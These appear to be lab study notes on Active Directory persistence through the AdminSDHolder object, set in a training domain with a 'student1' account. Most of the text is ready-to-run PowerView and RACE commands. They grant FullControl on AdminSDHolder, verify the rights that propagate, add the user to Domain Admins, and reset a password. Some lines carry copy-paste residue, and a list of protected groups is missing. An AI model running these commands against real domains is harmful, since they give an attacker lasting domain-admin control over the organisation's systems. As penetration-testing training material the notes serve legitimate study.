AdminSDHolder
AdminSDHolder is an object located under the System container in AD. It defines ACLs for high-privilege "protected groups", such as:
A system process called SDProp runs every 60 minutes, syncing the ACL of protected group members to match that of the AdminSDHolder.
🎯 Persistence Technique:
Granting permissions to a user on the AdminSDHolder object causes that permission to propagate to all protected groups.
Example: Grant FullControl to student1
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' `
-PrincipalIdentity student1 `
-Rights All `
-PrincipalDomain dollarcorp.moneycorp.local `
-TargetDomain dollarcorp.moneycorp.local `
-Verbose
Alternative (RACE Toolkit):
powershellCopiaModificaSet-DCPermissions -Method AdminSDHolder `
-SAMAccountName student1 `
-Right GenericAll `
-DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' `
-Verbose
🔍 Verifying Admin Rights:
Using PowerView:
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |
ForEach-Object {
$_ | Add-Member NoteProperty 'IdentityName' (Convert-SidToName $_.SecurityIdentifier) -Force; $_
} | Where-Object {$_.IdentityName -match "student1"}
Or using the AD module:
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access |
Where-Object {$_.IdentityReference -match 'student1'}
Abusing AdminSDHolder Permissions
Add to DA group (if you have FullControl)
Add-DomainGroupMember -Identity 'Domain Admins' -Members student1
Reset password (if ResetPassword right is granted)
powershellCopiaModificaSet-DomainUserPassword -Identity student1 -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force)
Write group membership (WriteMembers)
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' `
-PrincipalIdentity student1 -Rights WriteMembers
Labs
